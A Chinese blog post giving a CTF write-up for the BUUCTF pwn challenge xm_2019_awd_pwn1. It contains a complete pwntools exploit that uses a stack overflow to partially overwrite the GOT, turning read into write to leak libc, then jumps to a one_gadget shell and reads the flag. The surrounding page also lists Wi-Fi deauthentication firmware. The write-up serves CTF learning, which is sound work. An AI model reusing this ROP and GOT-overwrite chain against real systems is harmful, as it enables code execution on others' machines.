[BUUCTF-pwn] xm_2019_awd_pwn1

最新推荐文章于 2022-09-20 16:24:30 发布
最新推荐文章于 2022-09-20 16:24:30 发布
阅读量272 收藏
点赞数 1
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122059267
版权

乍一看以为这题有多简单,直接给个溢出,还没有canary

ssize_t vuln()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  setbuf(stdin, buf);
  return read(0, buf, 0x100uLL);
}

再一看就有点意思了:

got表就两项

.got.plt:0000000000601000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC
.got.plt:0000000000601008 qword_601008    dq 0                    ; DATA XREF: sub_400490↑r
.got.plt:0000000000601010 qword_601010    dq 0                    ; DATA XREF: sub_400490+6↑r
.got.plt:0000000000601018 off_601018      dq offset setbuf        ; DATA XREF: _setbuf↑r
.got.plt:0000000000601020 off_601020      dq offset read          ; DATA XREF: _read↑r
.got.plt:0000000000601020 _got_plt        ends

有个提示 Ret2dl但似乎行不通, Ret2dlresolvePayload 根本就不工作,说是距离大

于是想到另外一个着:

        由于libc中write和read距离很近,可以通过爆破1位将got表的read改为write,然后输出得到libc,再将一个got值改为one

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

def connect():
    global p, libc_elf, one, libc_start_main_ret
    local = 0
    if local == 1:
        p = process('./pwn')
        libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
        one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
        libc_start_main_ret = 0x21a87
    else:
        p = remote('node4.buuoj.cn', 26934) 
        libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
        one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
        libc_start_main_ret = 0x21b97

context.log_level = 'debug'

pop_rdi = 0x00000000004006a3 #: pop rdi ; ret
pop_rsi = 0x00000000004006a1 #: pop rsi ; pop r15 ; ret
pop_rbp = 0x0000000000400528 #: pop rbp ; ret
leave_ret = 0x00000000004005dc #: leave ; ret
main_addr = 0x4005de
vuln_addr = 0x4005a7

def pwn():
    #gdb.attach(p, 'b*0x4005db')
    #pause()
    #lh = int(input('lh:'), 16)
    lh = 1
    sleep(0.1)
    payload = b'\x00'*0x28+ flat(
        pop_rdi,0, pop_rsi, elf.got['read'],0, elf.plt['read'],  #读两字节到got表将read改为write
        pop_rdi,1, pop_rsi, elf.got['read'],0, elf.plt['read'],  #调用write输出得到libc
        pop_rdi,0, pop_rsi, elf.got['setbuf'],0, elf.plt['read']+6, vuln_addr) #将setbuf改成one,这里通过plt+6还原read的got表
    payload = payload.ljust(0x100, b'\x00') 
    p.send(payload)

    sleep(0.2)
    p.send(p16(lh*0x1000 + (libc_elf.sym['write']& 0xfff)))

    libc_base = u64(p.recv(8)) - libc_elf.sym['write']
    system    = libc_base + libc_elf.sym['system']
    bin_sh    = libc_base + next(libc_elf.search(b'/bin/sh'))
    one_gadget= libc_base + one[1]  #local 1  remote 1
    sleep(0.2)
    p.send(p64(one_gadget))

    p.sendline(b'cat /flag')
    p.interactive()

while True:
    try:
        connect()
        pwn()
    except KeyboardInterrupt as e:
        exit()
    except:
        p.close()

石氏是时试
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JavaScript - Blob / File / base64 使用场景介绍与相互转换
王佳斌
04-26 2443
前言 本文首先介绍一下这三种对象使用场景,最后介绍下它们之间互转格式的解决方案。 您前端一旦涉及到文件或图片上传到服务器, 就势必离不了 Blob / File / base64 三种主流的类型。 Blob MDN: https://developer.mozilla.org/zh-CN/docs/Web/API/Blob 您可以观察到,像一些图片处理插件(例如有名的 vue-cropper )图片裁剪插件, 它们将图片处理完毕后,都将使用 blob 对象返回处理好的图片,供开发者用于上传服务器。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1028
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
qctf_2018_dice_game,xm_2019_awd_pwn2
m0_51251108的博客
09-20 198
qctf_2018_dice_game(溢出控制其他变量),xm_2019_awd_pwn2(tcache doublefree)
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 885
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
文件工具-base64转byte数组-网络图写入本地
RT_0114的博客
08-27 1万+
package org.wms.inv.wika.utils; import org.apache.commons.codec.binary.Base64; import sun.misc.BASE64Decoder; import sun.misc.BASE64Encoder; import javax.xml.bind.DatatypeConverter; import java.io.*; import java.net.URL; import java.util.Arrays; import .
其于js的五笔输入法!
11-10 3万+
在线五笔TD { FONT-SIZE: 9pt}A:link { COLOR: #000080; TEXT-DECORATION: none}A:visited { COLOR: #808080; TEXT-DECORATION: none}A:hover { COLOR: #f00000; TEXT-DECORATION: underline}TEXTAREA { BORDER-RIGHT: #
微信小程序实现动态时间滚动
GXQ的博客
05-25 2万+
github地址:https://github.com/axlsdtkl/wechat-mini/tree/master/time_demo 效果为打开微信小程序,实现动态时间滚动: 文件目录: index.js: import { dateFormat } from "../../utils/index.js" const app = getApp() Page({ data: { timer: null, currentDate: "" }, onLoad: funct
记录首次单独完成的js混淆之旅
qq_43808273的博客
12-01 2458
目标网址 :aHR0cHM6Ly93d3cueGlhb2xhbmJlbi5jb20vc2VhcmNoP2tleT0lRTYlQjElOUYlRTglOEIlOEYmcGFnZT0x 分析 1、首先进行抓包,发现红色框圈起来的参数,就是我们这次的目标。 2、然后我们直接全局搜索sign或者xhr断点,就可以定位到这个参数形成的地方。 3、在这里下断点,然后可以发行,h_sign的确是这里生成的。我们看到他是由dosign这个函数传入两个参数生成。右键进入dosign函数。 4、剩下的就是扣代码和缺
调用百度智能云OCR接口识别身份证和户口本
热门推荐
小伙伴的博客
05-12 49万+
一、百度智能云获取token类编写 package com.wy.gcserver.ocr.service; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.http.client.SimpleClientHttpRequestFactory; import org.springframework.stereotype.Service; import org.springframewo
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
MySQL查询加速器:利用Query Cache提升效率
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
Objective-C语言的基础教程.md
最新发布
07-31
Objective-C是一种面向对象的编程语言,是C语言的扩展。它主要用于苹果的iOS和macOS应用程序开发。
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装pwntools:使用命令`python3 -m pip install --upgrade pwntools`来安装并更新pwntools。 2. 安装mosquitto程序和mosquitto-clients客户端程序:使用命令`sudo apt install mosquitto`和`sudo apt install mosquitto-clients`来安装mosquitto程序和mosquitto-clients客户端程序。 请注意,以上步骤假设您已经在Linux环境下进行操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值